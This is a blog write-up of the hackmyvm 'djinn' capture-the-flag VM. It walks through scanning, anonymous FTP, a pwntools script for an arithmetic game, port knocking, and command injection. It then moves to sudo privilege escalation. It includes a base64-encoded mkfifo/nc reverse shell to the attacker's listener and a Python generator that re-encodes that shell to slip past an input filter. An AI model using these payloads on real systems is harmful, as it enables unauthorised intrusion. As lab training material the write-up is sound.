The free CTF challenge web site “hackmyvm.eu” has another easy-level VM called ‘djinn’ for us to download, enumerate and pull some flags from. In this write-up I will try to describe my method and thought process for completing this hackmyvm djinn CTF challenge.
This well put together room has a few tricks up its sleeves and will confuse the best of us. Although marked easy, I didn’t find it so. There are a few ways to beat this room, but I’ll not put the unintended ones here. If you found one, then great. As I am about learning and the sharing of CTF knowledge, I will do it the intended way (I think).
Table of Contents
- Set Up
- Wrap Up
Setup for hackmyvm djinn
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.19 – This is the djinn vm.
For enumeration of the hackmyvm djinn challenge I will be using the BlackArch system build that I created in a previous blog post. You can use Kali, BlackArch, Parrot or just a standard Linux install to follow along.
The first command to run is a quick nmap scan for network service enumeration.
nmap -F 192.168.186.19
So FTP is open, and it accepts an anonymous login with no password.
There are some files to download. They can be grabbed with the ftp client's “get” command (or “mget” to pull several at once).
Now that we have the files locally we can take a look at them. I did, and the only one I am interested in for now is game.txt. Let's take a look at it.
Time to Play a Game
Taking a look at the port named in game.txt, we can see there is indeed a game to be played.
nc 192.168.186.19 1337
So we have to answer 1000 arithmetic questions to get something useful.
This sounds like trouble. Fortunately we can automate the whole lot with Python and pwntools. Take a look at the code below. As this is not a Python tutorial I won't go into any detail of the code, but I do have another post with some details of the tubes in pwntools.
import ast
import pwn

server = '192.168.186.19'
port = 1337

c = pwn.remote(server, port)
c.recvuntil(b'gift.\n')    # skip the intro text, which ends with "...your gift."

count = 0
while count < 1001:
    count += 1
    # each question is sent as a tuple such as (8, 4, '+'); read up to its closing bracket
    data = c.recvuntil(b')').decode()
    c.recv()               # swallow the prompt that follows the question
    num1, num2, todo = ast.literal_eval(data[data.rfind('('):])
    if todo == '+':
        answer = num1 + num2
    elif todo == '-':
        answer = num1 - num2
    elif todo == '*':
        answer = num1 * num2
    elif todo == '/':
        answer = num1 / num2
    c.send((str(answer) + '\n\r').encode())
    print(answer, count)

# whatever the server sends after the last answer is the "gift"
print(c.recv().decode())
This will put a lot of text on the screen, but at the end you will see the below…
These are ports for port knocking: they have to be knocked in sequence to open up another port, which I happen to know is port 22 for SSH.
Run the command below a few times until port 22 is open. It needs a few goes because nmap probes the listed ports in a random order unless you pass -r, so the knock only lands in the right sequence some of the time.
nmap -p 1356,6784,3409,22 192.168.186.19
So we have opened SSH, but we have no username or password, so on with the enumeration.
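The knock can also be done deterministically from Python, which is handy if you are already in a pwntools script. The following is an added example and not code from the original write-up; the knock ports and the target port are the ones the game handed out above, and the host is the lab VM. The connect function is injectable so the logic can be exercised without a network.

```python
import socket
import time

# Ports from the game's "gift" (the page's values) and the port they open.
KNOCK_PORTS = [1356, 6784, 3409]
TARGET_PORT = 22


def tcp_connect(host, port, timeout=1.0):
    """Open one TCP connection and close it; the knock daemon only needs the SYN."""
    with socket.create_connection((host, port), timeout=timeout):
        pass


def knock(host, ports, connect=tcp_connect, delay=0.2):
    """Knock each port in order. Knock ports are normally closed, so a refused
    or timed-out connection is the expected result and still counts as a knock."""
    done = []
    for port in ports:
        try:
            connect(host, port)
        except OSError:          # ConnectionRefusedError / timeout: the SYN still went out
            pass
        done.append(port)
        time.sleep(delay)
    return done


def port_open(host, port, connect=tcp_connect):
    """True if a TCP connection to host:port succeeds."""
    try:
        connect(host, port)
        return True
    except OSError:
        return False


def open_ssh(host, ports=KNOCK_PORTS, target=TARGET_PORT, connect=tcp_connect,
             attempts=3, delay=0.2):
    """Knock the sequence, then check the target port; retry in case a knock was lost."""
    for _ in range(attempts):
        knock(host, ports, connect=connect, delay=delay)
        if port_open(host, target, connect=connect):
            return True
    return False


if __name__ == '__main__':
    print('ssh open:', open_ssh('192.168.186.19'))
```

Unlike the nmap one-liner, this always sends the knocks in the listed order, so one run is normally enough; the retry loop only guards against a dropped knock.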
Back to NMap
Let's run a full port scan.
nmap -p- 192.168.186.19
This returns an extra port we did not see before.
Run nmap service detection against it to find out more.
nmap -sV -p 7331 192.168.186.19
A Web Server?
Nothing of interest on the front page!
Let's run gobuster against it.
gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.186.19:7331
All is not what it seems here. The input it takes doesn't like spaces, full stops or slashes, so it's not much good. Or is it? We can hand it a base64-encoded command and get a reverse shell. But first have nc listening in another window.
nc -vlnp 1234
The command below decodes to a standard mkfifo/nc reverse shell pointing at 192.168.186.150 port 1234, i.e. my listener, so you will have to re-encode it with your own IP address and port.
echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xODYuMTUwIDEyMzQgPi90bXAvZg==" | base64 -d ` | sh -
And you should get a reverse shell!
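Rather than re-encoding by hand, the payload can be built for any listener. This is an added example, not code from the original post; it reproduces the page's blob for the page's IP and port, and it also checks the encoded form against the characters the input field rejects, because the standard base64 alphabet includes “/”, so a different IP or port can produce a blob that the filter would reject. Whether the filter is applied to the encoded blob is an assumption here; the fix of appending trailing spaces to the command until the encoding comes out clean is harmless because the shell ignores them.

```python
import base64

# Characters the page says the input field rejects (assumed to apply to the blob).
BANNED = ' ./'


def reverse_shell_command(ip, port):
    """The mkfifo/nc reverse shell the page's base64 blob decodes to."""
    return f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {ip} {port} >/tmp/f"


def encode_payload(command):
    return base64.b64encode(command.encode()).decode()


def decode_payload(blob):
    return base64.b64decode(blob).decode()


def encode_avoiding(ip, port, banned=BANNED, max_pad=16):
    """Base64-encode the reverse shell, padding the command with trailing spaces
    (which the shell ignores) until the blob contains none of the banned characters."""
    command = reverse_shell_command(ip, port)
    for pad in range(max_pad + 1):
        blob = encode_payload(command + ' ' * pad)
        if not any(ch in blob for ch in banned):
            return blob
    raise ValueError(f'no clean encoding within {max_pad} bytes of padding')


def wrapped_payload(ip, port):
    """The same shape as the page's one-liner: decode with base64 -d, run with sh."""
    return f'echo `echo "{encode_avoiding(ip, port)}" | base64 -d` | sh -'


if __name__ == '__main__':
    print(wrapped_payload('192.168.186.150', 1234))
```

Run it with your own listener address and paste the printed line where the page's one went; decode_payload is there so you can confirm what you are about to execute before you send it.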
Now that we have a shell, you can browse the system looking for the good stuff. In /home/nitish/.dev/creds.txt you will find the login details for a user called “nitish”.
As the SSH port is now open, we can just ssh in as this user.
Once logged in you will find the user flag in nitish's home directory, and “sudo -l” shows there are some sudo commands available.
So what is this genie? Well, it's a pain and doesn't grant the wish you asked for. After a lot of messing about with it I found the following.
- The help (-h) output lists some options, but one (-cmd) is missing from it.
- You can find it by running the strings command against the binary and picking out anything that looks like a flag.
strings /usr/bin/genie |egrep "^-"
Run the genie command as the user sam.
sudo -u sam /usr/bin/genie b -cmd
Now you are the user “sam”.
The user sam also has a sudo entry of his own (again, check with “sudo -l”).
So “/root/lago” is a script with some options. Option 2 is a guessing puzzle, and if we get it right we get a prize.
The prize here is a root shell. I used the loop below and kept hitting “2” and then Enter until the guess was finally right. It took about 50 goes, roughly 60 seconds in total, just hitting “2” and Enter as fast as I could.
Run the below command as the user “sam” and then hit the keyboard as fast as you can.
while true;do sudo /root/lago; done
The root flag is in /root for you to submit.
I hope you got some value and knowledge from this. If you are not familiar with pwntools then I would encourage you to learn about its tubes, as they can be very valuable for automating CTFs. And who doesn't love Python!